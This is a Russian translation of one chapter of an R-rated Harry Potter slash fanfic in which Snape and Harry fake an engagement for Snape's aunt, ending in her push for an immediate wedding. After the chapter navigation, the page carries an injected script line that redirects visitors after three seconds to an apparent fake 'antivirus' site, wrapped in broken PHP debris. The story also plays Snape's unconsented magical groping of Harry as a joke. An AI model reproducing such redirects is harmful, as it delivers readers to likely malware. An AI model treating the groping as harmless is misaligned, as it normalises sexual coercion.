Mistletoe (Омела)

Автор: Forever then some
Перевод: Kirrsten
Бета: Laconic
Пейринг: ГП/СС
Категория: Слэш
Рейтинг: R
Жанр: Humor/Romance
Статус         закончен.
Disclaimer:  Эта история написана только для развлечения, а ни как не для получения прибыли.
Разрешение на перевод:  получено.
Оригинал: здесь

Глава 3

– Прекрати действовать мне на нервы, – приказал Северус, проталкиваясь  на следующее утро мимо Гарри к ванной. Тот, уже полностью одетый, прислонился к кровати и фыркнул, враждебно провожая мужчину глазами. –  Именно это я и имею в виду. Ведешь себя так, словно я в любой момент  собираюсь напасть на тебя! 

Взгляд враждебный сменился недоверчивым:

– А разве нет?

– Нет, не собираюсь. 

– Но ночью… ты сказал…

– Нужно продемонстрировать тетушке, что мы поддерживаем интимные отношения. Она становится подозрительной, – нетерпеливо пояснил Снейп, исчезая с глаз Гарри в дверном проеме и включая воду в ванной. 

– Но разве имеет значение, кто кого из нас будет лап... прикасаться к другому?.. – Гарри повысил голос, перекрикивая шум льющейся воды.

Северус вновь появился в дверях и прищурился:

– И что это должно означать? 

– Это значит, что я бы чувствовал себя комфортнее, прикасаясь к кому-то, чем как кто-то, кого... трогают. А так как именно я делаю тебе одолжение, оставаясь здесь... 

– Я оказываю тебе услугу взамен.

– Договор, – настаивал Гарри, – не предусматривал, что ты будешь меня лапать!

– Наш договор предусматривает тебя в качестве моего fiancé. И вести ты себя должен соответственно, как fiancé. И ты будешь вести себя так и наслаждаться моими прикосновениями.   

– Зачем?

– Зачем?.. Любая нормальная пара вела бы себя так.

– Да что ты знаешь об этом? Ты никогда не был помолвлен!

– Совсем не обязательно испытать на себе  Avada Kedavra, чтобы узнать, насколько она неприятна.

– Выходит, помолвка со мной приравнивается к Avada Kedavra?

Назвался груздем... Расслабься, ты всегда можешь закрыть глаза и представить, что я – мисс Уизли. 

Перед мысленным взором Гарри тут же возник образ молодой женщины, которую он, к сожалению, отдельно от всей остальной семьи Уизли не воспринимал. А образ улыбающейся круглолицей Молли и мысль о ласках Северуса не имели ничего общего.

– Ага, только вряд ли это поможет... 

– Расслабься. Это будет выглядеть не страшнее, чем легкое поглаживание, а не так, словно я собираюсь сразу изнасиловать тебя.

Гарри выгнул бровь и двинулся к двери, ведущей в коридор. Северус внезапно дернулся, стремительно выскочил из ванной и пристально вгляделся в сияющие глаза молодого человека:

– Ты что сейчас прикасался?.. – не способный произнести больше ни слова, он лишь жестом указал на определенное место на брюках.

Гарри чуть приоткрыл рот, невинные глаза до смешного широко распахнулись:

– Я? Отсюда? Клевета! – Северус угрожающе нахмурился и издал что-то похожее на рык. – Успокойся, ничего кроме легкого поглаживания, – Поттер остановился в дверях и повернулся к зельевару, наслаждаясь его сердитым, хмурым видом. И вызывающе улыбнулся. – Если я в самом деле начну поглаживать твою задницу, вряд ли ты останешься равнодушным. Будешь хорошим мальчиком –  я покажу тебе разницу.

Но юношеское самодовольство тут же испарилось, когда он почувствовал невидимое прикосновение где-то внизу, затрагивающее ту часть тела, которую никак нельзя было назвать задней. Кровь отлила от его лица.

Черт побери, и когда же он  научится не  провоцировать бывшего Пожирателя Смерти?!

Полчаса спустя, умытый и одетый Северус спустился вниз посмотреть, что ещё придумали его гости.

Тетушка сидела за столом с чашкой чая в руке и тарелкой овсянки, дымящейся перед ней, а Гарри стоял напротив, опираясь о кухонный стол двумя руками, одетыми в рукавички для духовки.

– Доброе утро, любимый, – сладко, слишком сладко пропел он, с надеждой поворачиваясь к Северусу. Тот посмотрел на него так, будто у гриффиндорца выросла вторая голова, а мальчишка упрямо ждал, вытянув губы в трубочку; в зеленых глазах плескалась неуверенность – осмелиться ли Северус поддержать ту опасную игру, которую он начал?

Взгляд профессора остановился на Кларе, с интересом наблюдающей за  происходящим. Именно это и заставило Снейпа подойти к юному нахалу, одним пальцем слегка повернуть его голову, так, чтобы спрятать их лица от тетки, и поцеловать воздух немного выше рта молодого человека:

– Доброе утро, Гарри, тетя Клара.

– Северус, – ровно поздоровалась женщина, указывая на стол: – Садись, твой мальчик приготовил  завтрак, который выглядит просто потрясающе.

Снейп выгнул бровь в сторону Гарри, того самого Гарри, который говорил, что не умеет готовить:

– Приготовил? Он?

Поттер тем временем вынул из духовки очередной противень бисквитов с корицей и поставил на стол – остывать.

– Именно я, хотя, не уверен, что определение «мальчик» ещё уместно.

– Пффф, – без тени раскаяния фыркнула Клара. – В моем возрасте каждый, кому только предстоит узнать жизнь, кажется юнцом.

– И насколько же вы стары? – храбро спросил Гарри.

– Рядом с кем-то столь юным, я чувствуя себя так, словно мне, по крайней мере, семьдесят, – чуть обиженно протянула Клара.

Северус сплел пальцы и оперся локтями на стол, с преувеличенной серьезностью всматриваясь в тетю:

– Как жаль, но у меня есть полное право утверждать, что ты на день-другой старше шестидесяти восьми. 

Бух! Трость резко опустилась на пол.

– Не будь развязным, Северус! Ты прекрасно знаешь, что мне всего  шестьдесят семь.

Гарри склонился над столом, ставя тарелку перед Снейпом. Содержимое действительно выглядело хорошо.

– Спасибо, Гарри.

– Пожалуйста, Северус, – усмехнулся тот, скользя ладонью по спине Снейпа и мягко ее поглаживая. Мужчина немедленно отклонился назад, захватывая ласкающую его руку  в ловушку между своим телом и спинкой стула. С хорошо замаскированной дрожью, Гарри  высвободил руку и сел на свое место. – И раз я готовил, то тебе мыть посуду.

– Разумеется, – Северус, слегка растягивая слова, медленно повернулся в сторону Клары. – Я подумал, может, ты захочешь это сделать, тетя, в благодарность за завтрак?

– Ффф. Я его уже заработала, с трудом удерживая вас в рамках приличий.

Племянник пристально посмотрел на неё:

– А кто, дорогая тетя, удержит тебя?

Гарри, откидываясь на стул и раскачиваясь взад-вперед, отломил кусочек булочки и запихал в рот, с удовольствием наблюдая ссору Клары и Северуса. Это давало ему возможность почувствовать себя... членом настоящей семьи.

Краем глаза заметив грустную полуулыбку на губах Поттера, Северус неожиданно задался вопросом, о чем же думает этот мальчик? Не о том ли, что уже скоро он будет с Уизли? С ней?

Гарри часто бывал в этом доме во время войны, сидел за этим самым столом, вместе с членами Ордена Феникса, но тогда все было по-другому. Не так. Северус никогда не смотрел на него через стол, чувствуя, что именно здесь место Гарри. Облизывающего корицу с пальцев, добавляющего кошмарное количество сливок в чай, смеющегося, улыбающегося, спорящего с его тетей...

С тех самых пор, как под его крышей обосновался Гарри Поттер, то есть последние несколько дней, Северус был не в состоянии думать ни  о чем другом, кроме как о царящем в доме хаосе.

 

Теперь, впервые,

он подумал о том, как это будет, когда Гарри уйдет.

Пусто

 

Завтрак прошел мирно. Чему были рады все сидящие за столом. Как только они закончили, Гарри поднялся и принялся собирать посуду.

– Гарри, дорогой, мне кажется, это обязанность Северуса.

– Мне не трудно помочь, Клара.

– Вряд ли это можно называть помощью – ты делаешь всю работу за него. Северус, поднимайся и приступай.

Снейп, вздыхая, встал и стал наблюдать, как Гарри собирает чашки. Потом молодой человек повернулся, наклонился над раковиной, и джинсы туго обтянули задницу, а тонкая рубашка, облепившая плечи, дала возможность полюбоваться на мускулистый торс.

Возможно, этот момент был вполне подходящим,  чтобы  представить Кларе требуемые доказательства. Начать внедрять план прямо с утра, и заодно избавить Поттера от глупых мыслей на тему «легких поглаживаний».

 

Так что наш герой решил взять все – в том числе и Гарри – в собственные  руки.

 

Приняв решение, Северус приблизился к Гарри сзади и нежно обнял его за талию, вдавливая в столешницу, а потом слегка провел по бедру свободной рукой, не касаясь, однако, задницы. Он расслышал хриплый звук, родившийся в горле молодого человека, и на мгновенье  мелькнула мысль, чем был спровоцирован этот хрип – неожиданностью или отвращением от прикосновении другого мужчины? И не просто мужчины, а его старого сальноволосого Мастера Зелий. Да какая, собственно, разница? Ведь все это только для того, чтобы убедить тетю, а не получать удовольствие. Правильно? Правильно.

Во всяком случае, правильным это казалось до того момента, пока сквозь одежду не стал проникать жар юного тела. Мерлин знает, как долго он не был так близко с мужчиной, обнимая, прикасаясь.

 

Откровенно говоря, даже Мерлин затруднился бы вспомнить – так давно это было.

 

Боги, он совсем  забыл, как приятно чувствовать теплое, живое тело в своих объятиях. Гарри подходил просто идеально – он был ниже Северуса, и его худощавое тело естественно двигалось в такт движениям зельевара. Голова Северуса непроизвольно наклонилась вперед, задевая щекой взъерошенные черные пряди. Невероятно мягкие. Его губы были так близко к щеке Гарри, что если бы молодой человек повернул голову, совсем немного… 

И в тот самый миг, когда он подумал об этом, Гарри так и поступил, утыкаясь носом ему в щеку, зарываясь им в волосы, скользя гладкой кожей по короткой щетине, а потом еще чуть-чуть повернул голову, медленно соединяя их дыхания. Время замерло за миг до поцелуя…

– Вы, двое, этаким образом посуда  не вымоется!

Гарри отпрянул, больно стукаясь бедром о столешницу. Северус быстро отступил на шаг назад, а затем, для большей безопасности, ещё на один.

– Надеюсь, я не очень помешала.

– Нет, конечно, – поторопился с ответом Гарри, склоняясь над раковиной.

– Назови хоть одну причину, по которой ты решила проследить за тем, как мы моем посуду? – проворчал Северус. – Спешу тебя уверить – мы не собирались продолжить…

– О, не знаю... Это выглядело очень мило и возбуждающе. Но, раз уж ты спросил, почему я пришла… Я вот тут подумала... нужно спланировать день!  

Двое мужчин восприняли реплику, как намек покинуть кухню, и с завидной скоростью ринулись к двери.

– Не так быстро! – замахала Клара, хватая Северуса за локоть, и грозно качнула в сторону Гарри тростью. – Сядьте!

Они сели.

 

А теперь обратите внимание.

Последняя часть  главы немного запутана, так как:

Клара и Гарри объединяются, чтобы обмануть Северуса;

Северус и Гарри объединяются, чтобы обмануть проклятую трость.

И, в итоге, Клара действует в одиночку, чтобы обмануть их обоих.

 

– Ты умеешь кататься на коньках, Гарри?

– На коньках? Да.

– Насколько хорошо?

– Сносно. Моя подруга Джинни несколько лет назад научила меня. Она хорошо катается, умеет даже  делать различные вращения, я же только способен предохранять колени от ударов. По большей части. На самом деле, я недолго катался. 

– Замечательно! Я хочу покататься на коньках. Когда я ехала к тебе, Северус, то видела, как на речке, покрытой льдом, совсем недалеко отсюда, катаются целые семьи.

Северус помрачнел и напомнил:

– Ты не катаешься на коньках, тетя.

Клара невинно сложила руки и отрезала:

– Мне бы хотелось понаблюдать, как кто-то катается.

– Я занят, и в умении Гарри кататься на коньках сильно сомневаюсь, так что вряд ли  тебе будет интересно смотреть на нас.

– Не думаю, что ты слишком занят, будучи в отпуске, Северус. Ты вполне можешь оторваться от чтения и немного развлечь своего fiancé.

– Мог бы. Но у нас нет коньков.

– Я могу поискать на чердаке. Я могу преобразовать что-нибудь на чердаке.

Услышав веселый тон Гарри, Снейп зловеще уставился на него

– У нас. Нет. Коньков.  

– Ладно. Придется нам с Гарри как-нибудь по-другому развлекаться. Гарри, дорогой, Северус никогда не рассказывал тебе историю о своей подруге, Пенелопе? Его вымышленной подруге… Кто это был, Северус? Ласка?

– Евразийский полосатый барсук. И мне было четыре. – Снейп ткнул пальцем куда-то в сторону Поттера: – Гарри, иди, поищи коньки.

Клара застенчиво заулыбалась:

– Северус, я почему-то думала, что  у тебя нет времени на отдых.

– А я с удовольствием послушал бы истории о твоем детстве, – услужливо влез Поттер. – Ты мог бы почитать пока что-нибудь, любимый.

– Тащи коньки, – с угрозой рявкнул Северус. – В этом доме никаких историй не будет. 

– Тебе совершенно нечего стыдиться, Северус – дети часто выдумывают себе  друзей, когда им одиноко.

– Я не был одинок. Гарри, проклятье, что б тебе,  почему ты ещё здесь?

Гарри почувствовал беспокойство, волнами исходящее от Северуса, и пожалел, что вмешался не в свое дело, причинив тем самым мужчине боль. Если кто-нибудь и знал о ранах, нанесенных в детстве, так это он сам. Ему стоит быть внимательнее.

Он вынырнул из собственных воспоминаний и прикоснулся к руке Снейпа, обхватывая пальцами теплую напряженную ладонь:

– Ты, наверно, лучше знаешь, где их найти, чем я.

– Ладно, я посмотрю. – Выдернув руку, профессор покинул гостиную и стал подниматься вверх по лестнице.

Гарри заметил, как Клара с силой сжала губы, на её лице застыло беспокойство. Их глаза встретились, и она вздохнула:

– Теперь ты считаешь меня настоящим монстром?

– Я не думаю о Вас плохо, – спокойно ответил он.

– Просто…  Он никогда не говорил об этом… даже когда был  ребенком. Никогда ничего о том, что происходило в этом доме. Я не могу помочь,  но думаю, что он всегда будет помнить, что мой брат и его жена делали с ним.

– Вы не можете давить на такого человека как Сн… Северус. Этим Вы  только  усилите сопротивление.

– Северус ужасно упрямый.

Губы Гарри сложились в ироническую усмешку:

– Мне известно.

– А ты знаешь, что и я тоже?

– Упрямы? – В этот момент, между ними двумя возникло что-то  вроде понимания. – О, поверьте мне, Клара, у меня нет никакого намерения мешать вашим планам. Независимо от того, что Вы…

– Я только хочу, чтобы он был счастлив, – вздохнула та, устремляя глаза вверх. – Я прошу немногого.

 

Гарри начинал думать, что, действительно, совсем немного.

Нисколько

 

Поттер скользил на коньках взад-вперед, и красно-золотой гриффиндорский шарф развивался позади него, в то время как Северус стоял на берегу реки рядом с хорошо укутанной тетей.

Гарри отрабатывал торможение, пробуя использовать для этого лезвия коньков, а не падение на задницу, и девять раз из десяти ему это удавалось. Кларе везло меньше: она весьма неудачно пыталась убедить Северуса в достоинствах традиционного Рождественского вечера.

– Ну же, Северус, что за праздник без индейки и прочих милых вещей? –  взывала она все громче. – Ты согласен, Гарри?

Гарри подкатил к парочке и, взмахнув руками в тщетной попытке остановиться, свалился перед ними на снег:

– Простите? Я не расслышал.

– Просто скажи «да», – проинструктировала Клара. – Это подтолкнет Северуса.

– Тогда, конечно, да, – любезно улыбнулся Гарри, щеки которого мило порозовели от мороза.

– Ты, – выдохнул Северус, уставившись вниз на гриффиндорца. – От тебя никакой помощи не дождешься.

– Пфф, – гнева Северуса тот явно не боялся.

– Ты начинаешь походить на мою тетю, – с кислой миной констатировал Снейп.

– Правда? – спросила Клара почти радостно, поворачиваясь и сжимая одетыми в варежки руками  щеки Гарри. – Он быстро заменит тебя, в качестве моей гордости и радости.

Гарри смотрел на Северуса с откровенно самодовольным выражением.

– Предатель, – выдохнул Снейп.

– Это ты про кого, Северус? – Клара разделила с Гарри злорадную улыбку.

– Про обоих. Предполагается, что вы оба должны быть на моей стороне, а не объединяться  против меня.

– Мы совершенно ничего не затеваем против тебя, – сказала тетушка  успокаивающе. – А теперь, почему бы тебе не покататься вместе со своим  fiancé, Северус?

Северус так и поступил бы, если бы не два очень неприятных факта, недавно обнаруженные им. Во-первых, вода замерзла неравномерно, образуя на поверхности выемки и ухабы. Изящно скользить по такому катку возможным не представлялось.

Во-вторых – что раздражало больше всего – Гарри оказался более чем приличным конькобежцем. Он действительно был очень хорош, если не принимать во внимание тот факт, иногда падал. Маленький лгун.

С угрюмым видом (и-вовсе-не-для-того-чтобы-быстрее-убраться-от-тетки), Северус, пошатываясь, выкатился на лед прямо к Гарри. Тот, начал кружить вокруг него, демонстрируя отличные навыки катания и немалый опыт.

Северус фыркнул и скрестил было руки на груди, но потерял равновесие и  вновь растопырил их:

– Так значит, ты катался на коньках несколько раз?

– Да.

– А может, немного больше, чем несколько?

– Пожалуй.

– Так зачем притворялся, что не умеешь?

– Ну, – Гарри насмешливо скрестил руки, имитируя любимую позу зельевара, – возможно потому, что не должен был соглашаться… но я рад, что пошел.

– И что заставило тебя передумать?

– Удовольствие наблюдать, как ты, пошатываясь, стоишь на льду, словно твои ноги сделаны из желе, – Гарри пробовал скрыть улыбку, появившуюся в уголках губ.

– Сейчас же сотри с лица это самодовольное выражение, – пролаял Снейп.

– Северус, если ты только сам себя отпустишь, то тоже сможешь оценить юмор ситуации, – ответил Гарри, по-прежнему кружащий вокруг зельевара, но на этот раз в зеленых глазах горело озорство. 

– Попытаться найти юмор в… – бормотал Северус. – Давайте попробуем понять, что можно найти смешного в ногах из желе...  

Годы практики позволили Гарри почувствовать небольшой выброс магии в его направлении со стороны Северуса. Конечно, тот хотел только подтолкнуть Гарри и заставить шлепнуться на задницу, и не ожидал, что тот достаточно быстро отразит атаку, потянется, схватит его и упадет вместе с ним. 

Ноги Гарри загадочно поскользнулись, и он тяжело приземлился на лед, а Северус не менее тяжело придавил его сверху.

– Вот болван! – тут же зашипел профессор, пробуя подняться с извивающегося тела. К несчастью для него, лед имел одну злополучную особенность, значительно  усложнявшую задачу – он был скользким.

– Ты заставил меня упасть, а теперь ещё и обзываешься! – зашипел Гарри, вжимаясь в Северуса. – Встань с меня!

Что, по-твоему, я пытаюсь сделать? – прорычал зельевар, пытаясь зафиксировать ладони и колени на ледяной поверхности, чему мешал извивающийся под ним Поттер.

Их пальто и шарфы запутались, и когда Северус справедливо решил, что хуже уже не будет, что-то твердое уткнулось ему в бок...

– Все в порядке, мальчики? – Клара ткнула в него концом трости. – Почему вы не поднимаетесь?

– Мы пытаемся! – закричали они в унисон.

Клара, очень осторожно перебирая ногами в ботинках, подошла поближе:

– Только не говорите мне, что вы запутались.

– Мы не запутались! – зарычал Снейп. Он схватил Гарри за бедра, грубо прижимая того ко льду. – Прекрати вертеться!

Поттер угомонился, и Северус вытянул край своего пальто и встал на колени, освобождая мальчика.

Как только Гарри почувствовал, что он свободен, то тут же поднялся на колени, а затем встал в полный рост. 

Северусу, к сожалению, подобный трюк не удался. Гарри и Клара с  безопасного расстояния наблюдали, как Северус, упираясь коньками в лед, чтобы обрести хоть какую-то опору, пробует встать.

– Может, тебе подать руку? – сладко спросил Гарри, когда Северус растянулся на животе.

– Подойди и помоги мне!

– А где волшебное слово?

– Немедленно иди сюда или я тебя прокляну! – Гарри многозначительно кивнул головой в сторону Клары и ухмыльнулся. Северус быстро исправился: – Будь ты проклят!

– Ты так настойчиво просишь… –  растягивая слова, Гарри скользнул к нему. Точнее, это можно было бы назвать скольжением, если бы трость Клары не попала под конек, и рывок из  скользящего не превратился в растягивающийся. Поттер приземлился рядом с Северусом, опять сбивая того с ног на четвереньки:

– Оууу!

– Боже, прости, Гарри. Но, знаешь, нужно глядеть под ноги! 

На примирительный тон молодой человек не купился и постарался устроиться удобнее, протискиваясь вверх между бедрами Северуса. Снейп чувствовал каждое движение и был твердо уверен, что с помощью дорогой тетушки Гарри весьма изощренно над ним издевается.

– Гарри, подними руку, вот так, тогда ты отодвинешься. Нет, нет, не так, вытянись! – Клара двигалась к ним, помогая себе тростью. Гарри продолжал ерзать и извиваться, потому что его задница уже основательно подмерзла на ледяной поверхности реки.

 

Если бы не проклятый холод, Северус мог бы поклясться, что он в аду.

 

– Поверить не могу, что она сделала это! – гневался профессор двадцать долгих минут спустя, после того, как они совершили короткую прогулку назад к тупику Прядильщиков. Дома Клара приказала им идти в спальню и переодеться в сухую одежду, пока она собственноручно сварит какао.

– В то, что она заставила меня упасть на лед? – мягко спросил Гарри, натягивая через голову красный свитер.

– Да, из всех детских, потенциально опасных, глупых выходок, допустимых...  

– Ну да, с помощью всех этих детских, опасных, бессмысленных выходок она, возможно, хотела… Представь себе, она поступила так же, как и ты.

– Я не… – ну, конечно, он это сделал. Ведь он воспользовался магией, чтобы толкнуть Гарри на лед, так же, как Клара  воспользовалась тростью. По некоторым причинам, совершенное им самим Северуса не волновало… Но вот кое-кто заплатит!

 

Это случилось, когда наш герой заручился помощью Гарри, чтобы выиграть битву.

 С тростью.

 

Клара вышла из кухни и обнаружила Гарри и Северуса, сидящих в креслах у камина и подозрительно перешептывающихся. Она поставила поднос с горячим какао на столик и с любопытством осмотрелась вокруг. 

– Где моя трость?

Но Гарри и Северус спокойно продолжали беседу, игнорируя Клару, тем более что передвигалась она по комнате без видимых проблем.

– Простите. Я спросила, где моя трость. Я оставила её вот здесь, рядом со стулом!

Северус ответил весьма лаконично:

– Мы её спрятали. 

Тетушка мягко прошелестела:

– И куда? 

– Если я расскажу, то какой был смысл ее прятать?

– Почему вы так поступили со слабой пожилой женщиной?

– Для одного визита мои локти и ноги достаточно пострадали.

Клара умоляюще посмотрела на Гарри:

– Гарри, дорогой, конечно же, ты не принимал участие в этой пакости?

– Ох, боюсь, что принимал, – с готовностью признался Гарри. – Северусу был нужен кто-то, кто следил бы за Вами. И я оказался тем, кто стоял у дверей в кухню и должен был завопить «синий гусь  в сумерках летит на север…», как только вы соберетесь выйти оттуда.

– Гарри, любимый, гусь был оранжевым, помнишь?

Поттер умильно похлопал длиннющими ресницами:

– Хммм, хорошо, что мне не пришлось воспользоваться паролем, иначе я бы все испортил.

– Да, шпион из тебя не выйдет. 

Молодой человек усмехнулся:

– Да ну, я и не претендую на подобное. Спасение мира и все такое…  

Северус весело  ухмыльнулся.

– Не знаю, о чем вы, но верните мне трость, – с ложной снисходительностью начала Клара, лишний раз доказывая, что она лжет. – Я больше никого специально не ударю. 

– Лжете, – с легкостью объявил Гарри.

– Сказать будущей любимой тете такую кошмарную вещь! – она с оскорбленным видом наклонилась к нему: – Как ты мог такое произнести?

– Не слишком-то ты проницательна, – улыбнулся Северус.

– Я сосчитаю до десяти, и вы вернете мне трость.

– Нет.

– Нахальный мерзавец! 

– Тетя Клара!

– Пффф. С какой стати я должна следить за своим языком, в моем-то возрасте?

– Ради приличия?..

– Фи. И что я должна, по-вашему, теперь делать?

– Гарри был так любезен, что принес сюда твое вязание, так что до ужина можешь спокойно отдыхать, – посоветовал Северус.

– Прекрасно. Но если мне придется здесь скучать, то и вы двое…

– О, мне нужно идти…

– И мне…

– Стоять!

Одинаково вздохнув, Гарри и Северус уселись и взяли по чашке какао. 

– Разговаривайте, пожалуйста, свободно и не обращайте на меня внимания. Я просто повяжу, пока не настанет время ужина. Считайте, меня нет.

И Северус, и Гарри понимали, что в обществе тетушки нужно притворяться, поэтому изо всех сил пытались поддерживать легкую светскую беседу, потягивая горячий напиток.

– Я рад, что Рождество будет снежным, – начал Гарри. – Это смотрится намного более празднично, чем сырая и грязная погода.

– Наверное. 

Молчание.

– В этом году праздники наступили очень быстро. Осталось всего четыре дня... 

– Только четыре?..

Снова напряженная тишина.

– Мерлин, – простонал про себя Гарри и тихо добавил, чтобы услышал Северус: – Мы оба просто кошмарны в обыкновенных домашних  беседах.

Северус незаметно обернулся и увидел, что Клара вроде бы полностью поглощена вязанием, а её руки ловко порхают над рядами шерсти:

– Мммм... – Хм, можно было бы неплохо развлечься, пока она не видит. Заодно подразнить Поттера. – Возможно,  мы просто должны найти лучшее применение нашим ртам и нашему времени.

К несчастью для него, заставить Гарри волноваться было практически невозможно, если только профессор не собирался затрагивать в беседе более личные темы:

– Рон решил научиться играть на губной гармошке. Что-то вроде этого?

Северус ухмыльнулся:

Что-то похожее.

– У тебя в доме есть музыкальные инструменты?

Северус многозначительно уставился на Гарри, решив добиться хотя бы румянца:

– Уверен, мы смогли бы отыскать что-нибудь, что ты смог бы обхватить ртом. 

Небольшое отступление, чтобы отметить, что, несмотря на воспитанность

и вопреки видимости, Гарри вовсе не невинен и при этом  не глуп.

Только немного медленно соображает.

 Гарри пожал плечами:

– Сомневаюсь, что у меня получится, я никогда не пробовал.

– С удовольствием понаблюдал бы за твоими попытками.

– Наблюдать за мной? Тебе это никакого удовольствия не доставит.

Северус оглянулся на тетку, все еще не обращающую ни них никакого внимания и, понизив голос, таинственно сказал:

– Есть способ одновременно доставить друг другу  удовольствие.

Гарри недоуменно покосился на черноволосого мужчину:

– О чем ты говоришь?

Клара дала о себе знать, не сбиваясь с ритма:

– Думаю, он имеет в виду фелляцию, дорогой Гарри.

Рот Поттера несколько раз беззвучно открылся и закрылся. Наконец, вдохнув достаточно, он пробормотал:

– Мне нужно... проверить ужин. Извините, я на секундочку, – и выскочил из комнаты.

Через несколько минут Северус присоединился к нему, отговорившись тем, что мальчику нужно помочь.

Дверь захлопнулась, и молодой человек оттолкнулся от плиты, впиваясь негодующим взглядом в мужчину. Уши его все ещё горели.

– Теперь всю оставшуюся жизнь меня будут преследовать кошмары об этом! 

– Ха!

– Что?

– Нет, ничего. Просто вспомнил, что ты советовал мне раньше, – ответил Снейп, усмехаясь. – Найти что-то смешное в ситуации. 

– Ублюдок!

– Гарри! – насмешливо вздернул брови Северус.

– Ох, иди, зови Клару, ужин готов.

– Отлично, пойду, позову мою восхитительно скромную тетушку поужинать с моим ангелом fiancé. Я весь в предвкушении замечательного ужина.

– Звучит не очень искренне.

– Да уж... Но будет именно так.

После ужина Северус затопил камин в гостиной. Клара мирно расположилась в кресле, поближе к огню.

Гарри с ногами забрался на диван и свернулся калачиком в углу, а её племянник прошел мимо свободного кресла и уселся на другом конце того же дивана. Она отметила про себя, что Северус выбрал место напротив Гарри, будто пытаясь привлечь его внимание.

Женщина откинулась на стуле и закрыла глаза, притворяясь задремавшей. Она чувствовала определенное уважение к обоим. В конце концов, за все шестьдесят семь лет ей никогда не встречались двое, способные одновременно с такой легкостью препираться и флиртовать.

Ей только хотелось, чтобы они остановились прежде, чем один из них пострадает. А они уже приближались к этой критической точке: Северус упомянул что-то о каком-то паршивом дураке, и Гарри вспыхнул. То ли о питомце, то ли о друге. Она была обязана вмешаться до того, как спор выйдет из-под контроля. Эх, была бы её трость на месте! 

Клара топнула ногой по ковру – удар её не удовлетворил:

– Прекратите ругаться! Может старая дама поспать в этом доме, в конце концов? И сядь прямо, Северус! Снейпы не сутулятся! Что подумает Гарри?

– Уверен, когда я надевал кольцо ему на палец, он соблазнился не моим  высоким положением. Теперь он уже пойман.

– Но мы пока не женаты, любимый, – поддразнил Гарри, насмешливо улыбаясь.

Северус выдавил такую же неискреннюю улыбку:

– Это только вопрос времени, мой любимый…

При этих словах Клара подскочила:

– А когда точно?

– Э-э-э?.. 

– Когда  точно это произойдет?

– Что произойдет? – с растущим страхом спросил Снейп.

– Свадьба, конечно.

– О, мы как-то не определились с днем, – быстро ответил Гарри.

– Чушь! Вы должны выбрать дату заранее, чтобы было время подготовиться. 

– Мы планировали небольшую церемонию, – объяснил Северус, – Ничего такого, что нужно планировать. Под влиянием момента.

– А гости? Им нужно время на подготовку. И я должна знать заранее, ведь вы, конечно же, захотите меня видеть там.

– Компания приглашенных будет ограничена, – заторопился племянник. 

– А Гарри? Наверняка, он не так необщителен как ты, Северус.

– Близких друзей у меня немного, только мои помощники, и двое из них могут прибыть сразу же. При помощи маленькой горсти летучего пороха.

Клара сложила руки:

– О! У меня есть блестящая идея!

Северус вздрогнул – ничего хорошего эти слова не сулили:

– И какая, мадам?  

– Мы сыграем свадьбу сейчас! 

Глаза Гарри стали размером с блюдце:

– Сейчас?!

– Ну, не прямо сейчас, а после Рождества. Просто чудесно! – настаивала Клара. – Я уже здесь, ваши друзья, как вы сказали, могут приехать очень быстро, у них, вероятно, есть свободное время. Грандиозную церемонию вы не хотите, значит, особенно готовиться не нужно. Ах, Святки – это настолько романтично!

– Это смешно!  Мы не можем заключить брак так внезапно!

– Почему нет? Через день или через месяц – какая разница? А я все оплачу – это будет мой Рождественский подарок вам обоим!

Гарри и Северус пораженно уставились друг на друга. Северус покачал головой:

– Совершенно невозможно.

– Почему? Вы любите друг друга – это очевидно, помолвлены, так почему бы не пожениться?

– Нет, – ответил Северус.

– Назови хоть одну стоящую причину и я закрою тему!

 В комнате повисло молчание.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>